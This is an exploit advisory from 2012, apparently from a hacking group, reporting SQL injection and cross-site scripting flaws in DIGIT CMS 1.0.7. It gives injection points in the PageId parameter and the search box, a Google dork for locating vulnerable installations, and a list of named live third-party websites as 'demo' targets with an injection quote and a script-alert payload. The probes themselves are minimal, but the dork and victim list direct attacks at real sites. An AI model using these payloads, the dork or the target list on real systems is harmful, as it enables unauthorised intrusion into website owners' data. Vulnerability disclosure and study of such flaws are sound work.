DIGIT CMS version 1.0.7 suffers from cross site scripting and remote SQL injection vulnerabilities.
f35ad762f228af8f8a3487ef7a01c9305f2268b1bd8b4832da330c23b01fc3d0
# Exploit Title: DIGIT Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.dig-it.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Site by DIGIT"
# Version : [1.0.7]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
-----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli]
~ [PoC]Http://[victim]/path/Default.asp?sType=0&PageId=[Sqli]
Enter In Search Box XSS Code ~
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM
name=searchFORM style="margin:0;padding:0">
<INPUT type="hidden" value="" name="txtSEARCH">
</FORM>
~ [PoC] ~: Http://[victim]/path/Default.asp
Note: There are vulnerabilities in the search field that you can use
Demo URL:
~~~~~~~~~
- http://www.sdle.co.il/Default.asp?sType=0&PageId=57499'
- http://www.alumgold.co.il/Default.asp?sType=0&PageId=59972'
- http://www.hb-raanana.com/Default.asp?sType=0&PageId=60413'
XSS ~
http://www.sdle.co.il/Default.asp
"><script>alert(0)</script> Java Code For Search Box
Timeline:
~~~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.
Important Notes:
~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in
- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper
Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------